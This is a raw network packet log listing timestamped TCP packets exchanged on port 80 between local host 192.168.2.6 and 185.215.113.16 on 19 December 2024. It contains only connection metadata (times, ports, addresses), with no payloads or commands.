Dec 19, 2024 10:10:20.193306923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.193357944 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.193361998 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.193418980 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.193739891 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.193792105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.193854094 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.193906069 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.194596052 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.194643974 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.194708109 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.194756031 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.195501089 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.195552111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.195631027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.195770025 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.196378946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.196429968 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.196435928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.196485043 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.197382927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.197433949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.197578907 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.197629929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.198319912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.198369980 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.198404074 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.198452950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.199095964 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.199145079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.199196100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.199246883 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.199773073 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.199820995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.199826956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.199872971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.200432062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.200470924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.200485945 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.200517893 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.201178074 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.201227903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.201234102 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.201281071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.202264071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.202315092 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.202383995 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.202433109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.203119040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.203169107 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.203250885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.203301907 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.203980923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.204031944 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.204077005 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.204127073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.204801083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.204849958 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.204936028 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.204984903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.205779076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.205828905 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.205918074 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.205967903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.206564903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.206614017 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.206685066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.206737995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.207381010 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.207433939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.207479954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.207525015 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.208147049 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.208198071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.208267927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.208317041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.208749056 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.208805084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.208877087 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.208935022 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.209530115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.209579945 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.209585905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.209631920 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.210395098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.210443974 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.210450888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.210503101 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.211040974 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.211091042 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.211163044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.211211920 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.211829901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.211880922 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.211931944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.211982012 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.212563992 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.212610960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.212616920 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.212662935 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.213258982 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.213310003 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.213388920 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.213438034 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.214010000 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.214062929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.214124918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.214174986 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.214960098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.215018988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.215095997 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.215143919 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.215845108 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.215894938 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.215981007 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.216031075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.216717005 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.216768980 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.216840982 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.216892004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.217582941 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.217638016 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.217703104 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.217752934 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.218712091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.218749046 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.218770027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.218791962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.219410896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.219455957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.219484091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.219588041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.220408916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.220459938 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.220500946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.220577955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.221443892 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.221493959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.221530914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.221577883 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.222363949 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.222414970 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.222419024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.222461939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.223365068 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.223412991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.223453045 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.223499060 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.224221945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.224268913 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.224308014 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.224349976 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.225073099 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.225122929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.225296021 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.225343943 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.225991011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.226042032 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.226131916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.226178885 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.226918936 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.226969957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.227035046 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.227082014 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.227719069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.227771997 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.227811098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.227852106 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.228532076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.228590012 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.228760004 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.228805065 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.229294062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.229337931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.229376078 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.229419947 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.230218887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.230267048 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.230295897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.230338097 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.231204987 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.231251955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.231362104 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.231415033 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.232021093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.232072115 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.232120037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.232167959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.375909090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.376008987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.376017094 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.376075029 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.376401901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.376455069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.376599073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.376599073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.377238989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.377366066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.377382994 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.377424955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.378127098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.378226995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.378268957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.378330946 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.379007101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.379060030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.379060984 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.379112005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.380032063 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.380084991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.380086899 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.380135059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.380773067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.380839109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.380891085 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.380942106 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.381691933 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.381746054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.381772995 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.381822109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.382639885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.382692099 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.382764101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.382812977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.383683920 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.383739948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.383796930 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.383847952 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.384327888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.384381056 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.384505987 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.384557009 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.385232925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.385287046 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.385413885 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.385463953 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.386118889 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.386171103 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.386235952 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.386286974 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.387218952 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.387267113 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.387273073 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.387326956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.388091087 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.388149023 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.388170958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.388225079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.388864040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.388941050 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.389123917 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.389242887 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.389792919 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.389843941 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.389894962 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.389945030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.390634060 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.390810966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.390845060 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.390860081 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.391539097 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.391594887 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.391649008 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.391704082 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.392616034 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.392669916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.392678976 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.392723083 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.393369913 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.393430948 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.393537998 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.393589020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.394165039 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.394221067 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.394273996 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.394328117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.395193100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.395253897 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.395260096 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.395306110 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.396019936 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.396074057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.396137953 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.396189928 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.396815062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.396867037 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.396941900 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.396990061 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.397733927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.397788048 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.397842884 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.397897005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.398715019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.398777962 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.398853064 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.398902893 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.399786949 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.399842024 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.399919987 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.399966955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.400710106 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.400760889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.400824070 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.400873899 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.401855946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.401902914 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.401967049 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.402015924 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.402566910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.402620077 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.402683020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.402731895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.403256893 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.403318882 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.403546095 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.403604984 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.404069901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.404124022 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.404172897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.404274940 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.404902935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.404958963 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.405009031 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.405060053 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.405740023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.405791044 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.405795097 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.405844927 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.406598091 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.406650066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.406727076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.406778097 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.407633066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.407685995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.407749891 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.407799959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.408488989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.408541918 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.408544064 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.408600092 CET	49881	80	192.168.2.6	185.215.113.16
